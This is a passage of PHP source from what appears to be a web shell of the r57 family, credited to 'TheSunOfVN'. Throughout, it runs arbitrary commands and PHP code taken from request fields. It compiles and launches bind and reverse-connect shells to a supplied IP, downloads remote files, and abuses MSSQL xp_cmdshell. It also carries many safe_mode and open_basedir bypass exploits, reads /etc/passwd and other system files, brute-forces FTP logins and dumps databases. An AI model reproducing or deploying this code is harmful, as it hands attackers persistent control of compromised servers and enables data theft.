1950 case 'own':
1951 @chown($_POST['param1'],$_POST['param2']);
1952 break;
1953 case 'grp':
1954 @chgrp($_POST['param1'],$_POST['param2']);
1955 break;
1956 case 'mod':
1957 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1958 break;
1959 }
1960 $_POST['cmd']="";
1961 }
1962if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1963 {
1964 switch($_POST['what'])
1965 {
1966 case 'file':
1967 if($_POST['action'] == "create")
1968 {
1969 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1970 else {
1971 fclose($file);
1972 $_POST['e_name'] = $_POST['mk_name'];
1973 $_POST['cmd']="edit_file";
1974 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1975 }
1976 }
1977 else if($_POST['action'] == "delete")
1978 {
1979 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1980 $_POST['cmd']="";
1981 }
1982 break;
1983 case 'dir':
1984 if($_POST['action'] == "create"){
1985 if(mkdir($_POST['mk_name']))
1986 {
1987 $_POST['cmd']="";
1988 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1989 }
1990 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1991 }
1992 else if($_POST['action'] == "delete"){
1993 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1994 $_POST['cmd']="";
1995 }
1996 break;
1997 }
1998 }
1999if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
2000 {
2001 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
2002 if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
2003 else {
2004 echo $table_up3;
2005 echo $font;
2006 echo "<form name=save_file method=post>";
2007 echo ws(3)."<b>".$_POST['e_name']."</b>";
2008 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
2009 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
2010 fclose($file);
2011 echo "</textarea>";
2012 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
2013 echo "<input type=hidden name=dir value=".$dir.">";
2014 echo "<input type=hidden name=cmd value=save_file>";
2015 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
2016 echo "</div>";
2017 echo "</font>";
2018 echo "</form>";
2019 echo "</td></tr></table>";
2020 exit();
2021 }
2022 }
2023if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
2024 {
2025 $mtime = @filemtime($_POST['e_name']);
2026 if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
2027 else {
2028 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
2029 @fwrite($file,$_POST['e_text']);
2030 @touch($_POST['e_name'],$mtime,$mtime);
2031 $_POST['cmd']="";
2032 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
2033 }
2034 }
2035if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
2036{
2037 cf("/tmp/bd.c",$port_bind_bd_c);
2038 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
2039 @unlink("/tmp/bd.c");
2040 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
2041 $_POST['cmd']="ps -aux | grep bd";
2042}
2043if (!empty($_POST['php_ini1']))
2044{
2045 cf("php.ini",$php_ini1);
2046 $_POST['cmd']=" Da write xong php.ini ! F5 nao !!!";
2047 }
2048 if (!empty($_POST['htacces']))
2049{
2050 cf(".htaccess",$htacces);
2051 $_POST['cmd']="Da write xong htaccess ! F5 di nao !!!";
2052 }
2053 if (!empty($_POST['file_ini']))
2054{
2055 cf("ini.php",$sni_res);
2056
2057 $_POST['cmd']="Try again :D";
2058 }
2059if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
2060{
2061 cf("/tmp/bdpl",$port_bind_bd_pl);
2062 $p2=which("perl");
2063 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
2064 $_POST['cmd']="ps -aux | grep bdpl";
2065}
2066if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
2067{
2068 cf("/tmp/back",$back_connect);
2069 $p2=which("perl");
2070 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
2071 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
2072}
2073if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
2074{
2075 cf("/tmp/back.c",$back_connect_c);
2076 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
2077 @unlink("/tmp/back.c");
2078 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
2079 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
2080}
2081if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
2082for($upl=0;$upl<=4;$upl++)
2083{
2084 if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
2085 if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
2086 else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
2087 @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
2088 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
2089 }
2090}
2091if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
2092{
2093 switch($_POST['with'])
2094 {
2095 case wget:
2096 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
2097 break;
2098 case fetch:
2099 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
2100 break;
2101 case lynx:
2102 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
2103 break;
2104 case links:
2105 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
2106 break;
2107 case GET:
2108 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
2109 break;
2110 case curl:
2111 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
2112 break;
2113 }
2114}
2115if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
2116 {
2117 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
2118 if(empty($ftp_port)) { $ftp_port = 21; }
2119 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
2120 if(!$connection) { err(3); }
2121 else
2122 {
2123 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
2124 else
2125 {
2126 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
2127 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
2128 }
2129 }
2130 @ftp_close($connection);
2131 $_POST['cmd'] = "";
2132 }
2133if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
2134 {
2135 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
2136 if(empty($ftp_port)) { $ftp_port = 21; }
2137 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
2138 if(!$connection) { err(3); $_POST['cmd'] = ""; }
2139 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><font color=#2aff00 face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
2140 @ftp_close($connection);
2141 }
2142echo $table_up3;
2143if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("dir -ao"); }
2144else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
2145echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td class=main><b><div align=center><textarea name=report cols=121 rows=15 spellcheck='false'>";
2146function dozip1($link,$file)
2147{
2148 $fp = @fopen($link,"r");
2149 while(!feof($fp))
2150 {
2151 $cont.= fread($fp,1024);
2152 }
2153 fclose($fp);
2154 $fp2 = @fopen($file,"w");
2155 fwrite($fp2,$cont);
2156 fclose($fp2);
2157}
2158if (isset($_POST['funzip']))
2159{
2160dozip1($_POST['funzip'],$_POST['fzip']);
2161}
2162if(empty($_POST['root'])){
2163} else {
2164 $root = $_POST['root']; }
2165 $c = 0; $D = array();
2166 set_error_handler("eh");
2167 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
2168 for($i=0; $i < strlen($chars); $i++){
2169 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
2170 $prevD = $D[count($D)-1];
2171 glob($path."*");
2172 if($D[count($D)-1] != $prevD){
2173 for($j=0; $j < strlen($chars); $j++){
2174 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
2175 $prevD2 = $D[count($D)-1];
2176 glob($path."*");
2177 if($D[count($D)-1] != $prevD2){
2178 for($p=0; $p < strlen($chars); $p++){
2179 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
2180 $prevD3 = $D[count($D)-1];
2181 glob($path."*");
2182 if($D[count($D)-1] != $prevD3){
2183 for($r=0; $r < strlen($chars); $r++){
2184 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
2185 glob($path."*");
2186 }
2187 }
2188 }
2189 }
2190 }
2191 }
2192 }
2193 $D = array_unique($D);
2194 foreach($D as $item)
2195 if(isset($_REQUEST['root']))
2196 echo "{$item}\n";
2197 function eh($errno, $errstr, $errfile, $errline){
2198 global $D, $c, $i;
2199 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
2200 if($o){ $D[$c] = $o[2]; $c++;}
2201 }
2202if($safe_mode)
2203{
2204 switch($_POST['cmd'])
2205 {
2206 case 'safe_dir':
2207 $d=@dir($dir);
2208 if ($d)
2209 {
2210 while (false!==($file=$d->read()))
2211 {
2212 if ($file=="." || $file=="..") continue;
2213 @clearstatcache();
2214 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
2215 if(!$unix){
2216 echo date("d.m.Y H:i",$mtime);
2217 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
2218 }
2219 else{
2220 $owner = @posix_getpwuid($uid);
2221 $grgid = @posix_getgrgid($gid);
2222 echo $inode." ";
2223 echo perms(@fileperms($file));
2224 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
2225 echo date("d.m.Y H:i ",$mtime);
2226 }
2227 echo "$file\n";
2228 }
2229 $d->close();
2230 }
2231 else echo $lang[$language._text29];
2232 break;
2233 case 'copy':
2234if(empty($snn)){
2235if(empty($_GET['snn'])){
2236if(empty($_POST['snn'])){
2237} else {
2238$u1p=$_POST['snn'];
2239}
2240} else {
2241$u1p=$_GET['snn'];
2242}
2243}
2244break;
2245 case 'test1':
2246 $ci = @curl_init("file://".$_POST['test1_file']."");
2247 $cf = @curl_exec($ci);
2248 echo $cf;
2249 break;
2250 case 'test4':
2251 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
2252 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
2253 if($db)
2254 {
2255 if(@mssql_select_db($_POST['test4_md'],$db))
2256 {
2257 @mssql_query("drop table r57_temp_table",$db);
2258 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
2259 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
2260 $res = mssql_query("select * from r57_temp_table",$db);
2261 while(($row=@mssql_fetch_row($res)))
2262 {
2263 echo $row[0]."\r\n";
2264 }
2265 @mssql_query("drop table r57_temp_table",$db);
2266 }
2267 else echo "[-] ERROR! Can't select database";
2268 @mssql_close($db);
2269 }
2270 else echo "[-] ERROR! Can't connect to MSSQL server";
2271 break;
2272case 'cURL':
2273 if(empty($_POST['ly0kha'])){
2274} else {
2275$curl=$_POST['ly0kha'];
2276$ch1 =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
2277curl_exec($ch1);
2278var_dump(curl_exec($ch1));
2279echo "</textarea></CENTER>";
2280}
2281break;
2282case 'copy':
2283if(empty($snn)){
2284if(empty($_GET['snn'])){
2285if(empty($_POST['snn'])){
2286} else {
2287$u1p=$_POST['snn'];
2288}
2289} else {
2290$u1p=$_GET['snn'];
2291}
2292}
2293 $u1p="";
2294$tymczas="";
2295$temp=tempnam($tymczas, "cx");
2296if(copy("compress.zlib://".$snn, $temp)){
2297$zrodlo = fopen($temp, "r");
2298$tekst = fread($zrodlo, filesize($temp));
2299fclose($zrodlo);
2300echo "".htmlspecialchars($tekst)."";
2301unlink($temp);
2302echo "</textarea></CENTER>";
2303}
2304break;
2305case 'ini_restore':
2306 if(empty($_POST['ini_restore'])){
2307} else {
2308$ini=$_POST['ini_restore'];
2309echo ini_get("safe_mode");
2310echo ini_get("open_basedir");
2311require_once("$ini");
2312ini_restore("safe_mode");
2313ini_restore("open_basedir");
2314echo ini_get("safe_mode");
2315echo ini_get("open_basedir");
2316include($_GET["ss"]);
2317echo "</textarea></CENTER>";
2318}
2319break;
2320case 'glob':
2321function reg_glob()
2322{
2323$chemin=$_REQUEST['glob'];
2324$files = glob("$chemin*");
2325foreach ($files as $filename) {
2326 echo "$filename\n";
2327}
2328}
2329if(isset($_REQUEST['glob']))
2330{
2331reg_glob();
2332}
2333break;
2334case 'zend':
2335 if(empty($_POST['zend'])){
2336} else {
2337$dezend=$_POST['zend'];
2338include($_POST['zend']);
2339print_r($GLOBALS);
2340require_once("$dezend");
2341echo "</textarea></p>";
2342}
2343break;
2344 case 'plugin':
2345 if ($_POST['plugin'] )
2346 {
2347$i = 0;
2348while ($i < 60000) {
2349 $line = posix_getpwuid($i);
2350 if (!empty($line)) {
2351 while (list ($key, $vl) = each($line)){
2352 echo $vl."\n";
2353 break;
2354 }
2355 }
2356 $i++;
2357}
2358
2359 }
2360 break;
2361 case 'test14':
2362 $ioncube = @ioncube_read_file($_POST['test14_cmd']);
2363 echo htmlspecialchars($ioncube);
2364 break;
2365 case 'test15':
2366 $tmp = '';
2367 if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
2368 elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
2369 elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
2370 elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
2371 else break;
2372 @unlink($tmp.'/result_test15.txt');
2373 @win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
2374 while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
2375 $lines = @file ($tmp.'/result_test15.txt');
2376 if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
2377 @unlink($tmp.'/result_test15.txt');
2378 break;
2379 case 'test16':
2380 $tmp = '';
2381 if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
2382 elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
2383 if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
2384 elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
2385 else break;
2386 $name=$tmp."\\".uniqid();
2387 $n=uniqid();
2388 $cmd=(empty($_SERVER['COMSPEC']))?'c:\\windows\\system32\\cmd.exe':$_SERVER['COMSPEC'];
2389 win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
2390 win32_start_service($n);
2391 win32_stop_service($n);
2392 win32_delete_service($n);
2393 while(!file_exists($name)) sleep(1);
2394 $exec=file_get_contents($name);
2395 unlink($name);
2396 echo htmlspecialchars($exec);
2397 break;
2398 case 'test18':
2399 if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
2400 elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
2401 if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
2402 elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
2403 else break;
2404 $name=$tmp."\\".uniqid();
2405 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
2406 $res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
2407 while(!file_exists($name)) sleep(1);
2408 $exec=file_get_contents($name);
2409 unlink($name);
2410 echo htmlspecialchars($exec);
2411 break;
2412 case 'test19':
2413if(Empty($test19) aNd Empty($_GET['test19']) aNd Empty($_POST['test19'])) diE("\n".$karatonik);
2414if(!empty($_GET['test19'])) $file=$_GET['test19'];
2415if(!empty($_POST['test19'])) $file=$_POST['test19'];
2416if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("<B><br>Shell by TheSunOfVN</B></FONT>");
2417elseif(!emptY($file)) die("Sorry... File ".htmlspecialchars($file)."doesn't exists or you don't have permissions");Beark;
2418case 'test20':
2419@ob_clean();
2420 $error_reporting = @ini_get('error_reporting');
2421 error_reporting(E_ALL ^ E_NOTICE);
2422 @ini_set("display_errors", 1);
2423 @ini_alter("display_errors", 1);
2424 $str=@fopen($_POST['test20_file'],"r");
2425 while(!feof($str)){print htmlspecialchars(fgets($str));}
2426 fclose($str);
2427 error_reporting($error_reporting);
2428 break;
2429case 'test21':
2430$filen=$_POST['test21_file'];
2431@fopen('srpath://../../../../../../../../../../../'.$_POST['test21_file'],"a");
2432if (file_exists($filen))
2433{
2434echo $lang[$language.'_text61'];
2435}
2436else
2437echo "Can't write file";
2438 break;
2439case 'test22':
2440 echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
2441 if(!$dir){$dir='/etc/';};
2442 if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
2443 if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
2444
2445 if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
2446 if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
2447 foreach($presets_rlph as $preset_rlph){
2448 if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
2449 }
2450 for($i=0; $i < strlen($chars_rlph); $i++){
2451 if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
2452 if($n_rlph<=1){continue;};
2453 for($j=0; $j < strlen($chars_rlph); $j++){
2454 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
2455 if($n_rlph<=2){continue;};
2456 for($x=0; $x < strlen($chars_rlph); $x++){
2457 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
2458 if($n_rlph<=3){continue;};
2459 for($y=0; $y < strlen($chars_rlph); $y++){
2460 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
2461 if($n_rlph<=4){continue;};
2462 for($z=0; $z < strlen($chars_rlph); $z++){
2463 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
2464 if($n_rlph<=5){continue;};
2465 for($w=0; $w < strlen($chars_rlph); $w++){
2466 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
2467 }
2468 }
2469 }
2470 }
2471 }
2472 }
2473 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
2474 break;
2475case 'test23':
2476 @session_save_path($_POST['test23_file2']."\0;$tempdir");
2477 @session_start();
2478 @$_SESSION[php]=$_POST['test23_file1'];
2479 $filen=$_POST['test23_file2'];
2480 if(file_exists($filen))
2481 echo $lang[$language.'_text61']." ".$filen;
2482 else
2483 echo "Can't write file";
2484 break;
2485case 'test24':
2486@putenv("TMPDIR=".$_POST['test24_file2']);
2487 @ini_set("session.save_path", "");
2488 @ini_alter("session.save_path", "");
2489 @session_start();
2490 @$_SESSION[php]=$_POST['test24_file1'];
2491 $filen=$_POST['test24_file2'];
2492 if(file_exists($filen))
2493 echo $lang[$language.'_text61']." ".$filen;
2494 else
2495 echo "Can't write file";
2496 break;
2497case 'test25':
2498 @readfile($_POST['test25_file1'], 3, "php://../../../../../../../../../../../".$_POST['test24_file2']);
2499 $filen=$_POST['test25_file2'];
2500 if(file_exists($filen))
2501 echo $lang[$language.'_text61'];
2502 else
2503 echo "Can't write file";
2504 break;
2505 case 'file1':
2506if(!empty($_POST['file1']))
2507 $file1=$_POST['file1'];
2508 $level=0;
2509 if(!file_exists("file1:"))
2510 mkdir("file1:");
2511 chdir("file1:");
2512 $level++;
2513 $hardstyle = explode("/", $file1);
2514 for($a=0;$a<count($hardstyle);$a++){
2515 if(!empty($hardstyle[$a])){
2516 if(!file_exists($hardstyle[$a]))
2517 mkdir($hardstyle[$a]);
2518 chdir($hardstyle[$a]);
2519 $level++;
2520 }
2521 }
2522 while($level--) chdir("..");
2523 $ch = curl_init();
2524 curl_setopt($ch, CURLOPT_URL, "file1:file1:///".$file1);
2525 if(FALSE==curl_exec($ch))
2526 die('>Sorry... File '.htmlspecialchars($file1).' doesnt exists or you dont have permissions.');
2527 curl_close($ch);
2528break;
2529 case 'file':
2530if(!empty($_POST['file']))
2531 $file=$_POST['file'];
2532 $level=0;
2533 if(!file_exists("file:"))
2534 mkdir("file:");
2535 chdir("file:");
2536 $level++;
2537 $hardstyle = explode("/", $file);
2538 for($a=0;$a<count($hardstyle);$a++){
2539 if(!empty($hardstyle[$a])){
2540 if(!file_exists($hardstyle[$a]))
2541 mkdir($hardstyle[$a]);
2542 chdir($hardstyle[$a]);
2543 $level++;
2544 }
2545 }
2546 while($level--) chdir("..");
2547 $ch = curl_init();
2548 curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
2549 if(FALSE==curl_exec($ch))
2550 die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
2551 curl_close($ch);
2552break;
2553 }
2554}
2555else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
2556 $cmd_rep = ex($_POST['cmd']);
2557 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
2558 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
2559if ($_POST['cmd']=="thesunofvn_mysql")
2560 {
2561 if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
2562 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
2563 $db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
2564 if($db)
2565 {
2566 if(@mysql_select_db($_POST['test3_md'],$db))
2567 {
2568 @mysql_query("DROP TABLE IF EXISTS thesunofvn");
2569 @mysql_query("CREATE TABLE `thesunofvn` ( `file` LONGBLOB NOT NULL )");
2570 @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['test3_file'])."\" INTO TABLE thesunofvn FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
2571 $r = @mysql_query("SELECT * FROM thesunofvn");
2572 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
2573 @mysql_query("DROP TABLE IF EXISTS thesunofvn");
2574 }
2575 else echo "[-] ERROR! Can't select database";
2576 @mysql_close($db);
2577 }
2578 else echo "[-] ERROR! Can't connect to mysql server";
2579 }
2580if ($_POST['cmd']=="ftp_brute")
2581 {
2582 $suc = 0;
2583 foreach($users as $user)
2584 {
2585 $connection = @ftp_connect($ftp_server,$ftp_port,10);
2586 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
2587 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2588 @ftp_close($connection);
2589 }
2590 echo "\r\n-------------------------------------\r\n";
2591 $count = count($users);
2592 if(isset($_POST['reverse'])) { $count *= 2; }
2593 echo $lang[$language.'_text97'].$count."\r\n";
2594 echo $lang[$language.'_text98'].$suc."\r\n";
2595 }
2596if ($_POST['cmd']=="php_eval"){
2597 $eval = @str_replace("<?","",$_POST['php_eval']);
2598 $eval = @str_replace("?>","",$eval);
2599 @eval($eval);}
2600if ($_POST['cmd']=="mysql_dump")
2601 {
2602 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
2603 $sql = new my_sql();
2604 $sql->db = $_POST['db'];
2605 $sql->host = $_POST['db_server'];
2606 $sql->port = $_POST['db_port'];
2607 $sql->user = $_POST['mysql_l'];
2608 $sql->pass = $_POST['mysql_p'];
2609 $sql->base = $_POST['mysql_db'];
2610 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
2611 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
2612 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
2613 else {
2614 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
2615 else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
2616 else { echo "[-] ERROR! Can't write in dump file"; }
2617 }
2618 }
2619echo "</textarea></div>";
2620echo "</b>";
2621echo "</td></tr></table>";
2622echo "<table width=100% cellpadding=0 cellspacing=0>";
2623function div_title($title, $id)
2624{
2625 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
2626}
2627function div($id)
2628 {
2629 if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
2630 return '<div id="'.$id.'">';
2631 }
2632if(!$safe_mode){
2633echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
2634echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
2635echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2636echo $te.'</div>'.$table_end1.$fe;
2637}
2638else{
2639echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
2640echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2641echo $te.'</div>'.$table_end1.$fe;
2642echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id511').$table_up2.div('id511').$ts;
2643echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2644echo $te.'</div>'.$table_end1.$fe;
2645}
2646if($safe_mode){
